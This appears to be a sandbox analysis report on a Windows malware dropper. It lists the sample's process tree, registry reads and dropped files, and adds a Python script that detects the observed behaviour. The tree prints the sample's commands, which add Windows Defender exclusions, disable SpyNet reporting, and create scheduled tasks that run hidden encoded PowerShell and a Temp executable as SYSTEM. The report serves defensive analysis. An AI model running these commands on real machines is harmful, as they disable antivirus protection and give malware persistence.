Analysis
-
max time kernel: 179s
max time network: 183s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-11-2022 19:11
Static task: static1
Behavioral task: behavioral1 (sample file.exe, resource win7-20220901-en)
Behavioral task: behavioral2 (sample file.exe, resource win10v2004-20221111-en)
General
-
Target: file.exe
Size: 7.3MB
MD5: fc2584e28d3a565d5787357b7e8b4f1d
SHA1: df7aa1db56e6c92c5260440874ff286d4e4fabd0
SHA256: da773e6f569c5c5b76ec58c61d1e30c7eda614e92929217d74377bb017e6d972
SHA512: 2da477731aaedb2e663fc6ed62cca867bf233d903d69985670d5598266b82b266bb8d20e27e74d028a36472a9b0225c2dc3b869aa62483e4ba5498650d52cbb6
SSDEEP: 196608:91OJAYQ8JX1ZiuVlta2EjcMNo2/tzycPN7lcpvvoDFyQbv:3OJAd8J1kWlc1No21z3l7EHoJLbv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
PID 4520 Install.exe; PID 2416 Install.exe
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Install.exe)
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Key value queried: \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation (Install.exe)
-
Drops file in System32 directory 1 IoCs
Processes:
File created: C:\Windows\system32\GroupPolicy\gpt.ini (Install.exe)
-
Drops file in Windows directory 1 IoCs
Processes:
File created: C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.job (schtasks.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox attaches a generic "likely ransomware" note to this signature, but no process IoC is recorded for it in this run, and nothing else in the report (no mass file writes, no ransom note, no encryption of user files) supports that reading; the only storage-related processes in the tree are the WPDBusEnum and fhsvc svchost instances, which are Windows services. Treat the ransomware hint as low confidence for this sample.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
PID 4588 schtasks.exe; PID 1640 schtasks.exe
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
PID 1700 powershell.EXE (2 IoCs)
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Token: SeDebugPrivilege, PID 1700 powershell.EXE
-
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
file.exe, Install.exe, Install.exe, forfiles.exe, forfiles.exe, cmd.exe, cmd.exe, powershell.EXE
Source PID / process -> target PID / process (number of WriteProcessMemory events; 44 in total)
2232 file.exe -> 4520 Install.exe (3)
4520 Install.exe -> 2416 Install.exe (3)
2416 Install.exe -> 3828 forfiles.exe (3)
2416 Install.exe -> 2208 forfiles.exe (3)
3828 forfiles.exe -> 4548 cmd.exe (3)
2208 forfiles.exe -> 1652 cmd.exe (3)
4548 cmd.exe -> 4532 reg.exe (3)
1652 cmd.exe -> 2280 reg.exe (3)
4548 cmd.exe -> 4396 reg.exe (3)
1652 cmd.exe -> 3760 reg.exe (3)
2416 Install.exe -> 4588 schtasks.exe (3)
2416 Install.exe -> 2120 schtasks.exe (3)
1700 powershell.EXE -> 5092 gpupdate.exe (2)
2416 Install.exe -> 3868 schtasks.exe (3)
2416 Install.exe -> 1640 schtasks.exe (3)
Processes (leading number = depth in the process tree)
-
1 C:\Users\Admin\AppData\Local\Temp\file.exe (PID 2232)
  "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Suspicious use of WriteProcessMemory
-
2 C:\Users\Admin\AppData\Local\Temp\7zSF83F.tmp\Install.exe (PID 4520)
  .\Install.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
-
3 C:\Users\Admin\AppData\Local\Temp\7zS6060.tmp\Install.exe (PID 2416)
  .\Install.exe /S /site_id "525403"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks computer location settings
  - Drops file in System32 directory
  - Enumerates system info in registry
  - Suspicious use of WriteProcessMemory
-
4 C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
  - Suspicious use of WriteProcessMemory
-
5 C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
  - Suspicious use of WriteProcessMemory
-
6 \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
-
6 \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
-
4 C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
  - Suspicious use of WriteProcessMemory
-
5 C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
  - Suspicious use of WriteProcessMemory
-
6 \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
-
6 \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
-
4 C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gkOjvlmYE" /SC once /ST 08:11:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  (decoded -EncodedCommand, UTF-16LE: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Creates scheduled task(s)
-
4 C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gkOjvlmYE"
-
4 C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gkOjvlmYE"
-
4 C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 20:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\KUdrePT.exe\" DC /site_id 525403 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
-
1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 1700)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (decoded -EncodedCommand, UTF-16LE: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
-
2 C:\Windows\system32\gpupdate.exe (PID 5092)
  "C:\Windows\system32\gpupdate.exe" /force
-
1 C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
-
1 C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
-
1 C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
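What the tree above shows, in order: the nested 7-Zip SFX stages (the 7zS*.tmp folders) drop Install.exe, which launches cmd.exe indirectly through forfiles.exe so that reg.exe can add the `exe` extension to Windows Defender's policy-level exclusions and set `SpyNetReporting` to 0 under HKLM\SOFTWARE\Policies (both written to the 32-bit and 64-bit views), creates and immediately runs a throw-away task that starts a hidden `gpupdate.exe /force`, presumably so the freshly written policy is applied, and finally registers a second task that runs KUdrePT.exe out of the user's Temp folder as SYSTEM. The Python below is an added example, not part of the sandbox report or of the sample: it runs a handful of detection rules over the command lines and registry reads copied from this report (embedded inline as constructed events; which of the two forfiles/cmd/reg chains carries which REG ADD is taken from the listing order) and decodes the `-EncodedCommand` argument. The rule names and the hypothetical `triage`/`classify_registry_read` helpers are this example's own.

```python
"""Triage the command lines and registry reads from the process tree above.

Added example: the events are copied from the sandbox report, the detection
rules are this example's own and are not the sandbox's signatures.
"""
import base64
import binascii
import re

# The -EncodedCommand payload from the gkOjvlmYE task and the powershell.EXE line.
ENC = ("cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAA"
       "SABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==")

# (pid, image, command line) triples copied from the process tree above.  The cmd/reg
# PIDs are matched to their REG ADD lines by listing order (an assumption).
EVENTS = [
    (2416, "Install.exe", r'.\Install.exe /S /site_id "525403"'),
    (4548, "cmd.exe",
     r'/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions"'
     r' /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows'
     r' Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&'),
    (2280, "reg.exe",
     r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting"'
     r' /t REG_DWORD /d 0 /reg:32'),
    (4588, "schtasks.exe",
     'schtasks /CREATE /TN "gkOjvlmYE" /SC once /ST 08:11:04 /F /RU "Admin" '
     '/TR "powershell -WindowStyle Hidden -EncodedCommand ' + ENC + '"'),
    (1640, "schtasks.exe",
     r'schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 20:15:00 /RU "SYSTEM" '
     r'/TR "\"C:\Users\Admin\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\KUdrePT.exe\"'
     r' DC /site_id 525403 /S" /V1 /F'),
    (1700, "powershell.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden "
     "-EncodedCommand " + ENC),
]

# Registry reads from the "Checks BIOS information" / "location settings" signatures.
REGISTRY_READS = [
    (2416, r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    (2416, r"\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000"
           r"\Control Panel\International\Geo\Nation"),
    (2416, r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName"),
]

DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
USER_TEMP = "\\appdata\\local\\temp\\"
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
VALUE_NAME = re.compile(r'/v\s+"?([^"\s]+)', re.I)
TASK_NAME = re.compile(r'/tn\s+"?([^"\s]+)', re.I)
RUN_AS = re.compile(r'/ru\s+"?([^"\s]+)', re.I)
TASK_ACTION = re.compile(r'/tr\s+"((?:\\"|[^"])*)"', re.I)   # /TR "..." with \" escapes


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify_registry_read(path):
    """Map a queried registry path to the evasion check it most likely serves."""
    p = path.lower()
    if r"\hardware\description\system" in p:
        return "hardware_fingerprint"   # BIOS version / product name: VM or sandbox detection
    if r"\control panel\international\geo\nation" in p:
        return "geofence"               # configured country code
    return None


def triage(events):
    """Return (pid, kind, detail...) findings for the suspicious command lines."""
    findings = []
    for pid, image, cmdline in events:
        low = cmdline.lower()
        # Any REG ADD under the Defender policy hive (exclusions, SpyNet/MAPS, ...)
        if "reg add" in low and DEFENDER_POLICY in low:
            m = VALUE_NAME.search(cmdline)
            findings.append((pid, "defender_policy_tamper", m.group(1) if m else "?"))
        # Task creation that runs as SYSTEM, out of a user Temp folder, or via encoded PowerShell
        if image.lower() == "schtasks.exe" and "/create" in low:
            name, run_as = TASK_NAME.search(cmdline), RUN_AS.search(cmdline)
            action = TASK_ACTION.search(cmdline)
            action_text = action.group(1) if action else ""
            reasons = []
            if run_as and run_as.group(1).lower() == "system":
                reasons.append("runs as SYSTEM")
            if USER_TEMP in action_text.lower():
                reasons.append("action lives in a user Temp folder")
            if ENCODED_ARG.search(action_text):
                reasons.append("action is encoded PowerShell")
            if reasons:
                findings.append((pid, "suspicious_scheduled_task",
                                 name.group(1) if name else "?", "; ".join(reasons)))
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append((pid, "encoded_powershell", decoded))
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
    for pid, path in REGISTRY_READS:
        print(pid, classify_registry_read(path), path)
```

The decoded task action is `start-process -WindowStyle Hidden gpupdate.exe /force`, which is exactly the gpupdate.exe child of powershell.EXE in the tree; matching `-e`/`-enc` prefixes and decoding as UTF-16LE (not UTF-8) is what makes that link visible in telemetry. The Defender rule keys on the policy hive rather than on the exclusion value name, so it also catches paths and process exclusions written the same way.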
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS6060.tmp\Install.exe
Filesize: 6.8MB
MD5: 893793fbd70ba4a92919d09205d6c9c1
SHA1: cb1832f1f9652faece655ffbf49d82feb98ca85a
SHA256: a240fda428ecca831c7730c83f40be6f43bb8370f33d8d66d4844b734011c57b
SHA512: e4e30918b96bd5b7d0b8bc6ac189b1ebad645b12e0ac3de061daa9e7003d6e746fee1c6d9cb637a7aa19543b3339c08dbdb1e35a78628e8764a07dedb3a73dc4
-
C:\Users\Admin\AppData\Local\Temp\7zSF83F.tmp\Install.exe
Filesize: 6.3MB
MD5: b7a2858c0b452218cb49839d0a9acbc1
SHA1: 6af3be70f7ba92abe9a24561d3f8db1eb2c8834b
SHA256: 529aa021ae449b2574f09baae8f298b1d647befcbd0dbcea4036b2f3c8db7104
SHA512: e8712076d86dbea94d3f7d8c5529e818dc07ceb6259548bbde2a70ad7c4fa16a241928ccaaa3993c6b18b6694fe79415d5efbfb7c9aaecb29ef661e0ccb17492
-
memory/1640-156-0x0000000000000000-mapping.dmp
-
memory/1652-144-0x0000000000000000-mapping.dmp
-
memory/1700-154-0x00007FF811B00000-0x00007FF8125C1000-memory.dmp (Filesize: 10.8MB)
-
memory/1700-153-0x00007FF811B00000-0x00007FF8125C1000-memory.dmp (Filesize: 10.8MB)
-
memory/1700-151-0x00000142A28F0000-0x00000142A2912000-memory.dmp (Filesize: 136KB)
-
memory/2120-150-0x0000000000000000-mapping.dmp
-
memory/2208-142-0x0000000000000000-mapping.dmp
-
memory/2280-146-0x0000000000000000-mapping.dmp
-
memory/2416-138-0x0000000010000000-0x000000001119D000-memory.dmp (Filesize: 17.6MB)
-
memory/2416-135-0x0000000000000000-mapping.dmp
-
memory/3760-148-0x0000000000000000-mapping.dmp
-
memory/3828-141-0x0000000000000000-mapping.dmp
-
memory/3868-155-0x0000000000000000-mapping.dmp
-
memory/4396-147-0x0000000000000000-mapping.dmp
-
memory/4520-132-0x0000000000000000-mapping.dmp
-
memory/4532-145-0x0000000000000000-mapping.dmp
-
memory/4548-143-0x0000000000000000-mapping.dmp
-
memory/4588-149-0x0000000000000000-mapping.dmp
-
memory/5092-152-0x0000000000000000-mapping.dmp